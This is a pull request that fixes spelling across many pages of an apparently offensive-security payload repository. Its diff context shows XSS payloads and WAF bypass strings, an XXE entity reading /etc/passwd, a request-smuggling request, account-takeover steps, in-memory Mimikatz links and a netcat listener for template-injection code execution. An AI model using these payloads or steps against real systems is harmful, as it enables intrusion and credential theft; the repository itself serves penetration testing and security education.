### PR TITLE
Fix(Docs): Correcting typos on the repo

### DIFF
--- a/API Key Leaks/README.md
+++ b/API Key Leaks/README.md
@@ -1,6 +1,6 @@
 # API Key Leaks
 
-> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares.
+> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developers might hardcode them or leave it on public shares.
 
 ## Summary
 
@@ -27,7 +27,7 @@
 
 ## Exploit
 
-The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
+The following commands can be used to takeover accounts or extract personal information from the API using the leaked token.
 
 ### Google Maps 
 

--- a/Account Takeover/README.md
+++ b/Account Takeover/README.md
@@ -20,7 +20,7 @@
 
 1. Request password reset to your email address
 2. Click on the password reset link
-3. Dont change password
+3. Don't change password
 4. Click any 3rd party websites(eg: Facebook, twitter)
 5. Intercept the request in Burp Suite proxy
 6. Check if the referer header is leaking password reset token.
@@ -115,7 +115,7 @@ Refer to **HTTP Request Smuggling** vulnerability page.
 3. Final request could look like the following
     ```powershell
     GET /  HTTP/1.1
-    Transfert-Encoding: chunked
+    Transfer-Encoding: chunked
     Host: something.com
     User-Agent: Smuggler/v1.0
     Content-Length: 83

--- a/Insecure Source Code Management/README.md
+++ b/Insecure Source Code Management/README.md
@@ -30,7 +30,7 @@ Check for the following files, if they exist you can extract the .git folder.
 ### Github example with a .git
 
 1. Check 403 error (Forbidden) for .git or even better : a directory listing
-2. Git saves all informations in log file .git/logs/HEAD (try 'head' in lowercase too)
+2. Git saves all information in log file .git/logs/HEAD (try 'head' in lowercase too)
     ```powershell
     0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
     15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.

--- a/Kubernetes/readme.md
+++ b/Kubernetes/readme.md
@@ -14,7 +14,7 @@
     - [Impersonating a Privileged Account](#impersonating-a-privileged-account)
 - [Privileged Service Account Token](#privileged-service-account-token)
 - [Interesting endpoints to reach](#interesting-endpoints-to-reach)
-- [API addresses that you should know](#api-adresses-that-you-should-know)
+- [API addresses that you should know](#api-addresses-that-you-should-know)
 - [References](#references)
 
 ## Tools

--- a/Methodology and Resources/Active Directory Attack.md
+++ b/Methodology and Resources/Active Directory Attack.md
@@ -1670,7 +1670,7 @@ PXE allows a workstation to boot from the network by retrieving an operating sys
     PS > Get-PXECreds -InterfaceAlias « lab 0 » 
 
     # Wait for the DHCP to get an address
-    >> Get a valid IP adress
+    >> Get a valid IP address
     >>> >>> DHCP proposal IP address: 192.168.22.101
     >>> >>> DHCP Validation: DHCPACK
     >>> >>> IP address configured: 192.168.22.101

--- a/Methodology and Resources/Cloud - AWS Pentest.md
+++ b/Methodology and Resources/Cloud - AWS Pentest.md
@@ -472,7 +472,7 @@ https://www.cyberark.com/threat-research-blog/golden-saml-newly-discovered-attac
 > Using the extracted information, the tool will generate a forged SAML token as an arbitrary user that can then be used to authenticate to Office 365 without knowledge of that user's password. This attack also bypasses any MFA requirements. 
 
 Requirement:
-* Token-signing private key (export from personnal store using Mimikatz)
+* Token-signing private key (export from personal store using Mimikatz)
 * IdP public certificate
 * IdP name
 * Role name (role to assume)

--- a/Methodology and Resources/Network Discovery.md
+++ b/Methodology and Resources/Network Discovery.md
@@ -139,11 +139,11 @@ cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machin
 sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
 
 
-# TCP grab banners and services informations
+# TCP grab banners and services information
 TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
 [ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP
 
-# UDP grab banners and services informations
+# UDP grab banners and services information
 UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
 [ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
 ```

--- a/Methodology and Resources/Windows - Mimikatz.md
+++ b/Methodology and Resources/Windows - Mimikatz.md
@@ -206,7 +206,7 @@ Mimikatz in memory (no binary on disk) with :
 - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1) from PowerShellEmpire
 - [Invoke-Mimikatz](https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1) from PowerSploit
 
-More informations can be grabbed from the Memory with :
+More information can be grabbed from the Memory with :
 
 - [Invoke-Mimikittenz](https://raw.githubusercontent.com/putterpanda/mimikittenz/master/Invoke-mimikittenz.ps1)
 

--- a/Open Redirect/README.md
+++ b/Open Redirect/README.md
@@ -21,7 +21,7 @@ https://famous-website.tld/signup?redirectUrl=https://famous-website.tld/account
 After signing up you get redirected to your account, this redirection is specified by the `redirectUrl` parameter in the URL.   
 What happens if we change the `famous-website.tld/account` to `evil-website.tld`?
 
-```powerhshell
+```powershell
 https://famous-website.tld/signup?redirectUrl=https://evil-website.tld/account
 ```
 

--- a/SQL Injection/README.md
+++ b/SQL Injection/README.md
@@ -225,7 +225,7 @@ tamper=name_of_the_tamper
 |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'|
 |charencode.py | Url-encodes all characters in a given payload (not processing already encoded)  |
 |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded)  |
-|equaltolike.py | Replaces all occurances of operator equal ('=') with operator 'LIKE'  |
+|equaltolike.py | Replaces all occurrences of operator equal ('=') with operator 'LIKE'  |
 |escapequotes.py | Slash escape quotes (' and ") |
 |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart |
 |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword  |

--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -1,6 +1,6 @@
 # Templates Injections
 
-> Template injection allows an attacker to include template code into an existant (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
+> Template injection allows an attacker to include template code into an existing (or not) template. A template engine makes designing HTML pages easier by using static template files which at runtime replaces variables/placeholders with actual values in the HTML pages
 
 ## Summary
 
@@ -387,7 +387,7 @@ Source: https://jinja.palletsprojects.com/en/2.11.x/templates/#debug-statement
 
 ### Jinja2 - Remote Code Execution
 
-Listen for connexion
+Listen for connection
 
 ```bash
 nv -lnvp 8000
@@ -475,7 +475,7 @@ Bypassing most common filters ('.','_','|join','[',']','mro' and 'base') by http
 {{ request }} would return a request object like com.[...].context.TemplateContextRequest@23548206
 ```
 
-Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
+Jinjava is an open source project developed by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/)
 
 ### Jinjava - Command execution 
 

--- a/Web Cache Deception/README.md
+++ b/Web Cache Deception/README.md
@@ -37,7 +37,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page
     Header: X-Original-URL (Symfony)
     Header: X-Rewrite-URL (Symfony)
     ```
-2. Cache poisonning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
+2. Cache poisoning attack - Example for `X-Forwarded-Host` unkeyed input (remember to use a buster to only cache this webpage instead of the main page of the website)
     ```js
     GET /test?buster=123 HTTP/1.1
     Host: target.com

--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -227,7 +227,7 @@ javascript:prompt(1)
 
 &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41
 
-We can encode the "javacript:" in Hex/Octal
+We can encode the "javascript:" in Hex/Octal
 \x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
 \u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
 \152\141\166\141\163\143\162\151\160\164\072alert(1)
@@ -824,7 +824,7 @@ javascript:([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,ナ]=[!!ウ]+!�
 
 ### Bypass using Lontara
 
-```javscript
+```javascript
 ᨆ='',ᨊ=!ᨆ+ᨆ,ᨎ=!ᨊ+ᨆ,ᨂ=ᨆ+{},ᨇ=ᨊ[ᨆ++],ᨋ=ᨊ[ᨏ=ᨆ],ᨃ=++ᨏ+ᨆ,ᨅ=ᨂ[ᨏ+ᨃ],ᨊ[ᨅ+=ᨂ[ᨆ]+(ᨊ.ᨎ+ᨂ)[ᨆ]+ᨎ[ᨃ]+ᨇ+ᨋ+ᨊ[ᨏ]+ᨅ+ᨇ+ᨂ[ᨆ]+ᨋ][ᨅ](ᨎ[ᨆ]+ᨎ[ᨏ]+ᨊ[ᨃ]+ᨋ+ᨇ+"(ᨆ)")()
 ```
 
@@ -997,25 +997,25 @@ Works for CSP like `script-src 'self' data:`
 
 ### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/bohdansec)
 
-#### 21st april 2020
+#### 21st April 2020
 
 ```html
 <svg/OnLoad="`${prompt``}`">
 ```
 
-#### 22nd august 2019
+#### 22nd August 2019
 
 ```html
 <svg/onload=%26nbsp;alert`bohdan`+
 ```
 
-#### 5th jule 2019
+#### 5th June 2019
 
 ```html
 1'"><img/src/onerror=.1|alert``>
 ```
 
-#### 3rd june 2019
+#### 3rd June 2019
 
 ```html
 <svg onload=prompt%26%230000000040document.domain)>
@@ -1023,19 +1023,19 @@ Works for CSP like `script-src 'self' data:`
 xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
 ```
 
-### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
+### Cloudflare XSS Bypass - 22nd March 2019 (by @RakeshMane10)
 
 ```
 <svg/onload=&#97&#108&#101&#114&#00116&#40&#41&#x2f&#x2f
 ```
 
-### Cloudflare XSS Bypass - 27th february 2018
+### Cloudflare XSS Bypass - 27th February 2018
 
 ```html
 <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;(document.domain)&rpar;">X</a>
 ```
 
-### Chrome Auditor - 9th august 2018
+### Chrome Auditor - 9th August 2018
 
 ```javascript
 </script><svg><script>alert(1)-%26apos%3B
@@ -1043,7 +1043,7 @@ xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
 
 Live example by @brutelogic - [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c1=</script><svg><script>alert(1)-%26apos%3B)
 
-### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th march 2018
+### Incapsula WAF Bypass by [@Alra3ees](https://twitter.com/Alra3ees/status/971847839931338752)- 8th March 2018
 
 ```javascript
 anythinglr00</script><script>alert(document.domain)</script>uxldz
@@ -1051,31 +1051,31 @@ anythinglr00</script><script>alert(document.domain)</script>uxldz
 anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz
 ```
 
-### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th september 2018
+### Incapsula WAF Bypass by [@c0d3G33k](https://twitter.com/c0d3G33k) - 11th September 2018
 
 ```javascript
 <object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
 ```
 
-### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th may 2019
+### Incapsula WAF Bypass by [@daveysec](https://twitter.com/daveysec/status/1126999990658670593) - 11th May 2019
 
 ```html
 <svg onload\r\n=$.globalEval("al"+"ert()");>
 ```
 
-### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th june 2018
+### Akamai WAF Bypass by [@zseano](https://twitter.com/zseano) - 18th June 2018
 
 ```javascript
 ?"></script><base%20c%3D=href%3Dhttps:\mysite>
 ```
 
-### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th october 2018
+### Akamai WAF Bypass by [@s0md3v](https://twitter.com/s0md3v/status/1056447131362324480) - 28th October 2018
 
 ```html
 <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>
 ```
 
-### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th september 2018
+### WordFence WAF Bypass by [@brutelogic](https://twitter.com/brutelogic) - 12th September 2018
 
 ```javascript
 <a href=javas&#99;ript:alert(1)>
@@ -1118,7 +1118,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [Abusing XSS Filter: One ^ leads to XSS(CVE-2016-3212)](http://mksben.l0.cm/2016/07/xxn-caret.html) by Masato Kinugawa
 - [Youtube XSS](https://labs.detectify.com/2015/06/06/google-xss-turkey/) by fransrosen
 - [Best Google XSS again](https://sites.google.com/site/bughunteruniversity/best-reports/openredirectsthatmatter) - by Krzysztof Kotowicz
-- [IE & Edge URL parsin Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify
+- [IE & Edge URL parsing Problem](https://labs.detectify.com/2016/10/24/combining-host-header-injection-and-lax-host-parsing-serving-malicious-data/) - by detectify
 - [Google XSS subdomain Clickjacking](http://sasi2103.blogspot.sg/2016/09/combination-of-techniques-lead-to-dom.html)
 - [Microsoft XSS and Twitter XSS](http://blog.wesecureapp.com/xss-by-tossing-cookies/)
 - [Google Japan Book XSS](http://nootropic.me/blog/en/blog/2016/09/20/%E3%82%84%E3%81%AF%E3%82%8A%E3%83%8D%E3%83%83%E3%83%88%E3%82%B5%E3%83%BC%E3%83%95%E3%82%A3%E3%83%B3%E3%82%92%E3%81%97%E3%81%A6%E3%81%84%E3%81%9F%E3%82%89%E3%81%9F%E3%81%BE%E3%81%9F%E3%81%BEgoogle/)

--- a/XXE Injection/Files/XXE PHP Wrapper.xml
+++ b/XXE Injection/Files/XXE PHP Wrapper.xml
@@ -3,7 +3,7 @@
   <contact>
     <name>Jean &xxe; Dupont</name>
     <phone>00 11 22 33 44</phone>
-    <adress>42 rue du CTF</adress>
+    <address>42 rue du CTF</address>
     <zipcode>75000</zipcode>
     <city>Paris</city>
   </contact>

--- a/XXE Injection/README.md
+++ b/XXE Injection/README.md
@@ -72,7 +72,7 @@ Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
   ```
   ruby server.rb
   ```
-- [docem](https://github.com/whitel1st/docem) - Uility to embed XXE and XSS payloads in docx,odt,pptx,etc
+- [docem](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc
   ```
   ./docem.py -s samples/xxe/sample_oxml_xxe_mod0/ -pm xss -pf payloads/xss_all.txt -pt per_document -kt -sx docx
   ./docem.py -s samples/xxe/sample_oxml_xxe_mod1.docx -pm xxe -pf payloads/xxe_special_2.txt -kt -pt per_place
@@ -155,7 +155,7 @@ We try to display the content of the file `/etc/passwd`
   <contact>
     <name>Jean &xxe; Dupont</name>
     <phone>00 11 22 33 44</phone>
-    <adress>42 rue du CTF</adress>
+    <address>42 rue du CTF</address>
     <zipcode>75000</zipcode>
     <city>Paris</city>
   </contact>


### PR DESCRIPTION
Fixing typos in the repository's documentation.
Basically, I ran the following command to spot typos: 
```
find . -type f | grep README | sed -e 's/\ /\\\ /g' | xargs cat | aspell list -d en_US --add-wordlists=exclusions.txt
``` 
With **exclusions.txt** being a file I progressively updated to filter out words in other languages than English, intentional "mistakes" (or now commonly used misspelled words like [referer](https://english.stackexchange.com/questions/42630/referer-or-referrer/42636)), and others.